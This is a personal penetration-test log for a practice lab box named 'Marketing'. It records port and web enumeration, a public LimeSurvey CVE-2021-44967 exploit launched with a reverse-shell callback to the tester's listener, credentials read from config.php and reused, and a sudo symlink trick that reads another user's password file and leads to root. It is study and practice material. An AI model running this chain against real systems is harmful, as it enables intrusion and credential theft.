Marketing

๐Ÿงช Pentest Log: {{date:2025-08-16}}

๐Ÿ” Target Information

ip=192.168.223.225

๐Ÿ“ก Enumeration

๐Ÿ”Œ Port Scanning

Command Used

ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)

nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt

nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt

Port 22

Port 80

Web Directory Scan

gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt

dirsearch -u http://$ip -r -o dirsearch.txt

wpscan --url http://$ip

Found /old/ page, within the page, found vhost

customers-survey.marketing.pg

Google for "limesurvey exploit", found

CVE-2021-44967

๐Ÿ’ฃ Exploitation

๐Ÿ“Œ Vulnerability Summary

๐Ÿš€ Exploit Execution

๐Ÿ”ง Exploit Method

Tool / Script Used:

https://github.com/D3Ext/CVE-2021-44967?tab=readme-ov-file

python3 CVE-2021-44967.py --url http://customers-survey.marketing.pg --user admin --password password --lhost 192.168.45.163 --lport 80


python3 /home/kali/Documents/oscp/Shell\ Handler/penelope/penelope.py -p 80

Found database credential at

cat /var/www/LimeSurvey/application/config/config.php

limesurvey_user:EzPwz2022_dev1$23!!

Reuse the password to login as t.miller

๐Ÿงฌ Privilege Escalation

๐Ÿ‘ค Current Access

๐Ÿ” Enumeration

Sudo:

sudo -l

Found

User t.miller may run the following commands on marketing:
    (m.sander) /usr/bin/sync.sh

Group:

find / -group mlocate 2>/dev/null | grep -v '^/proc\|^/run\|^/sys\|^/snap'

/var/lib/mlocate/mlocate.db
/usr/bin/mlocate

strings /var/lib/mlocate/mlocate.db

๐Ÿ”“ Privilege Escalation Exploit

๐Ÿ“Œ Exploit Summary

๐Ÿ”ง Exploit Steps

ln -sf /home/m.sander/personal/creds-for-2022.txt fk_this_box 

sudo -u m.sander /usr/bin/sync.sh fk_this_box

Found

m.sander: pa$word@123$4!!
m.sander: EzPwz2022_dev1$23!!
m.sander: EzPwz2022_12345678#!

Use the third password

sudo su -